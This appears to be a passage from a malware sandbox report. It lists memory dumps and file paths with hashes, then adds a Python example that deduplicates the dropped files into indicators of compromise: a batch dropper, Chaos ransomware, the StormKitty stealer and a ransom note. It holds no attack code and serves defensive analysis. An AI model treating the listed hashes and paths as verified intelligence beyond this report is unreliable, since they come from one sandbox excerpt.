memory/2880-7-0x000007FEF468E000-0x000007FEF468F000-memory.dmp

memory/2880-8-0x000000001B780000-0x000000001BA62000-memory.dmp

memory/2880-9-0x0000000002910000-0x0000000002918000-memory.dmp

memory/2880-10-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

memory/2880-11-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

memory/2880-12-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

memory/2880-13-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

memory/2880-14-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9e6c51a3f6886d64fc6dfcfc4f376fb4
SHA1 da9e5844939fd2b6d823870bb483ecf63855b440
SHA256 7a8239e7feee11f3922e57d89df79f9085aea7a1b29aca255eaab35880badb24
SHA512 e5f3b4f5ddb515fd5d69f93c21313c18dc0cbe93785b2385f370c2fa8f77acd7c27c67880d25f884037654af8e3fe11b983139d18632b56ece1fd1c5ed223b79

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2584-21-0x000000001B740000-0x000000001BA22000-memory.dmp

memory/2584-22-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2680-28-0x0000000140000000-0x0000000140028000-memory.dmp
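The Files lists of both detonations (behavioral2 above and behavioral1 here) mix the dropped payloads with artefacts any PowerShell or .NET process leaves behind (StartupProfileData, __PSScriptPolicyTest_*.ps1, CLR UsageLogs), memory dumps, and an empty named pipe. The dropper batch file also appears under two different temp names (610E.bat and AEB.bat) with identical hashes, so hash-keyed deduplication is what turns the two lists into one IOC set. The following is an added example, not part of the report: it parses the report's flattened path-plus-hash layout, filters the sandbox noise, and groups what remains by SHA256. The sample text is an excerpt copied from the two Files sections (SHA512 rows omitted to keep it short), and the noise patterns are this example's own choices.

```python
"""Turn the report's Files lists into a deduplicated hash IOC set.

Added example, not part of the sandbox report. SAMPLE_FILES_SECTION is an
excerpt of the Files sections above (SHA512 rows omitted); the noise filter
patterns are this example's own assumptions about what a sandbox run leaves
behind that is not a dropped file.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$", re.I)
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"  # SHA-256 of zero bytes

# Paths that carry no IOC value: memory dumps, named pipes, and files that
# PowerShell / the CLR / the shell write during any run.
NOISE_PATTERNS = (
    re.compile(r"^memory/", re.I),
    re.compile(r"^\\\?\?\\PIPE\\", re.I),
    re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$", re.I),
    re.compile(r"\\PowerShell\\StartupProfileData-", re.I),
    re.compile(r"\\CLR_v4\.0\\UsageLogs\\", re.I),
    re.compile(r"\\Recent\\CustomDestinations\\", re.I),
)


@dataclass
class FileRecord:
    path: str
    hashes: dict[str, str] = field(default_factory=dict)  # ALGO -> lowercase hex


def parse_files_section(text: str) -> list[FileRecord]:
    """Parse the flattened layout: a path line followed by zero or more
    '<ALGO> <hex>' lines. Entries without hash lines (memory dumps) are kept
    with an empty dict so the caller decides what to do with them."""
    records: list[FileRecord] = []
    current: FileRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            current.hashes[m.group(1).upper()] = m.group(2).lower()
        else:
            current = FileRecord(path=line)
            records.append(current)
    return records


def dropped_payloads(records: list[FileRecord]) -> list[FileRecord]:
    """Keep only hashed, non-empty files whose path does not match a noise pattern."""
    return [
        r for r in records
        if r.hashes and r.hashes.get("SHA256") != EMPTY_SHA256
        and not any(rx.search(r.path) for rx in NOISE_PATTERNS)
    ]


def unique_by_sha256(records: list[FileRecord]) -> dict[str, list[str]]:
    """Group paths by SHA256 so the same payload dropped under two names is one IOC."""
    by_hash: dict[str, list[str]] = {}
    for r in records:
        if "SHA256" in r.hashes:
            by_hash.setdefault(r.hashes["SHA256"], []).append(r.path)
    return by_hash


# Excerpt of the report's Files sections (copied; SHA512 rows omitted).
SAMPLE_FILES_SECTION = r"""
memory/1868-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55yv0lv5.2wm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 7605fb5c749eeea0b1b27fdaad78051c
SHA1 28388bf016af085bbcbacf8c516853942f6ec8d3
SHA256 466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

MD5 b6054dbe4ed853c2e35291f045a632ba
SHA1 1355fbe1ea1f6bb566921f04512f78590c4b0e41
SHA256 b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

C:\Users\Admin\readme.txt

MD5 60d646f40556d78166ad8111d850fc51
SHA1 babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256 a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

memory/2680-28-0x0000000140000000-0x0000000140028000-memory.dmp
"""

if __name__ == "__main__":
    for sha256, paths in unique_by_sha256(dropped_payloads(parse_files_section(SAMPLE_FILES_SECTION))).items():
        print(sha256, "<-", " | ".join(paths))
```

Feeding the full Files sections through this yields four hashes worth blocking or hunting on from the excerpt: the batch dropper, build.exe (Chaos), kernelv.exe (StormKitty) and the ransom note, with the dropper listed once under both of its temp-directory names. The ransom note hash is only useful as a detection, not a block, and the stealer's own output files under Temp\212.102.63.147\ are per-victim and should not go into a hash list at all.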